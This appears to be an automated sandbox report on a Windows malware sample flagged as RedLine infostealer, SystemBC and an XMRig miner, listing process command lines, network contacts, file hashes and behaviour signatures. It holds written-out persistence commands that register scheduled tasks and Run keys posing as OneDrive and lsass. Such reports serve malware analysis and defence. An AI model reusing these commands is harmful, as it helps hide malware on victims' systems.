powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 11:11 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1121.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#husln#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#husln#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp

Files

memory/324-54-0x00000000010D0000-0x00000000010EC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\60UPKQ826ALJ3KHH2AGH.temp

MD5 60dc053abe0071bc18ef45c4014bdee8
SHA1 648316f503f9325f12a9983cc74a27ec1528d6f0
SHA256 53e124e63bc24ea42d7c76ab333f44355c35a79b6ffe8e2fe681fdb1da7d35b8
SHA512 c9895c9ad47ead2246fc901788bc56d97ead1c72c06fc2d098e0dd0ba2908fec7506f88f4258da20ee7adf467fcda557eb8a60853212323600b0db4632cf6683

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 60dc053abe0071bc18ef45c4014bdee8
SHA1 648316f503f9325f12a9983cc74a27ec1528d6f0
SHA256 53e124e63bc24ea42d7c76ab333f44355c35a79b6ffe8e2fe681fdb1da7d35b8
SHA512 c9895c9ad47ead2246fc901788bc56d97ead1c72c06fc2d098e0dd0ba2908fec7506f88f4258da20ee7adf467fcda557eb8a60853212323600b0db4632cf6683

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 60dc053abe0071bc18ef45c4014bdee8
SHA1 648316f503f9325f12a9983cc74a27ec1528d6f0
SHA256 53e124e63bc24ea42d7c76ab333f44355c35a79b6ffe8e2fe681fdb1da7d35b8
SHA512 c9895c9ad47ead2246fc901788bc56d97ead1c72c06fc2d098e0dd0ba2908fec7506f88f4258da20ee7adf467fcda557eb8a60853212323600b0db4632cf6683

memory/1056-74-0x000000001B340000-0x000000001B622000-memory.dmp

memory/1056-75-0x0000000001F60000-0x0000000001F68000-memory.dmp

memory/1072-77-0x0000000002460000-0x00000000024E0000-memory.dmp

memory/1056-79-0x0000000002990000-0x0000000002A10000-memory.dmp

memory/760-81-0x0000000002850000-0x00000000028D0000-memory.dmp

memory/760-80-0x0000000002850000-0x00000000028D0000-memory.dmp

memory/1072-78-0x0000000002460000-0x00000000024E0000-memory.dmp

memory/1056-76-0x0000000002990000-0x0000000002A10000-memory.dmp

memory/1072-84-0x0000000002460000-0x00000000024E0000-memory.dmp

memory/1056-83-0x0000000002990000-0x0000000002A10000-memory.dmp

memory/1120-82-0x0000000002800000-0x0000000002880000-memory.dmp

memory/1072-85-0x000000000246B000-0x00000000024A2000-memory.dmp

memory/1056-86-0x0000000002990000-0x0000000002A10000-memory.dmp

memory/1120-87-0x0000000002800000-0x0000000002880000-memory.dmp

memory/760-88-0x0000000002850000-0x00000000028D0000-memory.dmp

memory/1120-89-0x0000000002590000-0x000000000259E000-memory.dmp

memory/1120-90-0x00000000025D0000-0x00000000025E0000-memory.dmp

memory/1056-92-0x0000000002990000-0x0000000002A10000-memory.dmp

memory/1056-91-0x0000000002990000-0x0000000002A10000-memory.dmp

memory/760-93-0x0000000002850000-0x00000000028D0000-memory.dmp

memory/760-94-0x0000000002850000-0x00000000028D0000-memory.dmp

memory/1056-95-0x0000000002990000-0x0000000002A10000-memory.dmp

memory/1056-97-0x0000000002990000-0x0000000002A10000-memory.dmp

memory/760-98-0x0000000002850000-0x00000000028D0000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 60dc053abe0071bc18ef45c4014bdee8
SHA1 648316f503f9325f12a9983cc74a27ec1528d6f0
SHA256 53e124e63bc24ea42d7c76ab333f44355c35a79b6ffe8e2fe681fdb1da7d35b8
SHA512 c9895c9ad47ead2246fc901788bc56d97ead1c72c06fc2d098e0dd0ba2908fec7506f88f4258da20ee7adf467fcda557eb8a60853212323600b0db4632cf6683

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

memory/944-117-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2016-119-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2016-118-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2016-120-0x00000000024EB000-0x0000000002522000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1624-123-0x000000013F9B0000-0x000000014037A000-memory.dmp

memory/944-124-0x0000000004380000-0x0000000004381000-memory.dmp

memory/944-126-0x00000000041F0000-0x00000000041F1000-memory.dmp

memory/944-125-0x00000000041E0000-0x00000000041E1000-memory.dmp

memory/944-127-0x00000000041D0000-0x00000000041D1000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\c:\users\admin\appdata\roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/676-136-0x00000000000E0000-0x0000000000500000-memory.dmp

memory/676-137-0x00000000000E0000-0x0000000000500000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 60dc053abe0071bc18ef45c4014bdee8
SHA1 648316f503f9325f12a9983cc74a27ec1528d6f0
SHA256 53e124e63bc24ea42d7c76ab333f44355c35a79b6ffe8e2fe681fdb1da7d35b8
SHA512 c9895c9ad47ead2246fc901788bc56d97ead1c72c06fc2d098e0dd0ba2908fec7506f88f4258da20ee7adf467fcda557eb8a60853212323600b0db4632cf6683

memory/856-143-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/856-144-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/856-145-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/856-146-0x000000000245B000-0x0000000002492000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Temp\tmp1121.tmp.bat

MD5 7d467798de3070e9007060339ba3b1c9
SHA1 32d22762a8a3486c6ecc92214b611f08b17a9c31
SHA256 8c60a33e28b3d92bf079e56fad2810c54ee4aebc577ce716b5452c55d81270d2
SHA512 bd89ef888fb568b4541d0d496829cc7be3578960c7a6ff438664daa72c242f2513efcc03fcea0de64d70e9bc2a98d8bdc8fff24d17044ed9e34869dccfe4694a

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\c:\programdata\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Temp\tmp1121.tmp.bat

MD5 7d467798de3070e9007060339ba3b1c9
SHA1 32d22762a8a3486c6ecc92214b611f08b17a9c31
SHA256 8c60a33e28b3d92bf079e56fad2810c54ee4aebc577ce716b5452c55d81270d2
SHA512 bd89ef888fb568b4541d0d496829cc7be3578960c7a6ff438664daa72c242f2513efcc03fcea0de64d70e9bc2a98d8bdc8fff24d17044ed9e34869dccfe4694a

memory/272-162-0x0000000001370000-0x0000000001790000-memory.dmp

memory/272-161-0x0000000001370000-0x0000000001790000-memory.dmp

memory/676-164-0x00000000000E0000-0x0000000000500000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\Desktop\TestCopy.txt

MD5 623dc332477178ec219141f550d00895
SHA1 555977f1ad7b43e7962671c823cd874b58f55d5c
SHA256 c7a9609a46985823128922fc628b8367556aa927061113fbe7a784db0123524e
SHA512 907ace2ea2358d73040714edf7d330a09e70e9a84df8b9bd6aa7b7610daeeb82b1e46b45ff18d61acd2095e46ed32fd3adc387b84381471a9f3bb1bbc1644999

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 60dc053abe0071bc18ef45c4014bdee8
SHA1 648316f503f9325f12a9983cc74a27ec1528d6f0
SHA256 53e124e63bc24ea42d7c76ab333f44355c35a79b6ffe8e2fe681fdb1da7d35b8
SHA512 c9895c9ad47ead2246fc901788bc56d97ead1c72c06fc2d098e0dd0ba2908fec7506f88f4258da20ee7adf467fcda557eb8a60853212323600b0db4632cf6683

memory/948-200-0x000000001AFC0000-0x000000001B2A2000-memory.dmp

memory/948-201-0x0000000001F10000-0x0000000001F18000-memory.dmp

memory/948-202-0x00000000023B4000-0x00000000023B7000-memory.dmp

memory/948-203-0x00000000023BB000-0x00000000023F2000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 89c57899e04e7c38c91318fcb840e61d
SHA1 0fe4702524734860000f7878f78a7233292205ec
SHA256 b00b125b8da96261842a86a07f751fdd17f709b0a0dd0cab0edc28d17490c464
SHA512 27cf0430ad07c4ae3c22e4140f3dc21ab99e90995edb8fda77dfda6f12dba4f8bbd8e08a7cea8d3fa809ee974c4f908e99a64853a4f69960241bd039140927d7

memory/944-204-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1800-207-0x000000013F840000-0x000000014020A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EHR2MWLWENF7A18Z8A6X.temp

MD5 89c57899e04e7c38c91318fcb840e61d
SHA1 0fe4702524734860000f7878f78a7233292205ec
SHA256 b00b125b8da96261842a86a07f751fdd17f709b0a0dd0cab0edc28d17490c464
SHA512 27cf0430ad07c4ae3c22e4140f3dc21ab99e90995edb8fda77dfda6f12dba4f8bbd8e08a7cea8d3fa809ee974c4f908e99a64853a4f69960241bd039140927d7

memory/320-213-0x000000001B100000-0x000000001B3E2000-memory.dmp

memory/272-212-0x0000000001370000-0x0000000001790000-memory.dmp

memory/564-214-0x0000000140000000-0x0000000140029000-memory.dmp

memory/944-215-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1800-216-0x000000013F840000-0x000000014020A000-memory.dmp

memory/272-217-0x0000000001370000-0x0000000001790000-memory.dmp

memory/944-219-0x0000000000400000-0x000000000083B000-memory.dmp

memory/320-222-0x00000000023D4000-0x00000000023D7000-memory.dmp

memory/272-221-0x0000000001370000-0x0000000001790000-memory.dmp

memory/320-224-0x00000000023DB000-0x0000000002412000-memory.dmp

memory/944-226-0x0000000000400000-0x000000000083B000-memory.dmp

memory/272-225-0x0000000001370000-0x0000000001790000-memory.dmp

memory/272-228-0x0000000001370000-0x0000000001790000-memory.dmp

memory/944-230-0x0000000000400000-0x000000000083B000-memory.dmp

memory/272-232-0x00000000033A0000-0x00000000033E0000-memory.dmp

memory/640-235-0x00000000000B0000-0x00000000000D0000-memory.dmp

memory/1800-234-0x000000013F840000-0x000000014020A000-memory.dmp

memory/944-236-0x0000000000400000-0x000000000083B000-memory.dmp

memory/272-237-0x0000000001370000-0x0000000001790000-memory.dmp

memory/640-238-0x0000000000270000-0x0000000000290000-memory.dmp

memory/640-240-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/856-241-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/944-242-0x0000000000400000-0x000000000083B000-memory.dmp

memory/272-244-0x0000000001370000-0x0000000001790000-memory.dmp

memory/272-243-0x0000000001370000-0x0000000001790000-memory.dmp

memory/272-245-0x00000000033A0000-0x00000000033E0000-memory.dmp

memory/944-247-0x0000000000400000-0x000000000083B000-memory.dmp

memory/640-248-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/640-249-0x0000000000270000-0x0000000000290000-memory.dmp

memory/272-250-0x0000000001370000-0x0000000001790000-memory.dmp

memory/640-252-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/944-253-0x0000000000400000-0x000000000083B000-memory.dmp

memory/272-254-0x0000000001370000-0x0000000001790000-memory.dmp

memory/640-256-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/272-258-0x0000000001370000-0x0000000001790000-memory.dmp

memory/944-257-0x0000000000400000-0x000000000083B000-memory.dmp

memory/640-260-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/944-261-0x0000000000400000-0x000000000083B000-memory.dmp

memory/272-262-0x0000000001370000-0x0000000001790000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-04 11:05

Reported

2023-05-04 11:08

Platform

win10v2004-20230220-en

Max time kernel

150s

Max time network

153s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Wine C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Roaming\\dllhost.exe'\"" C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
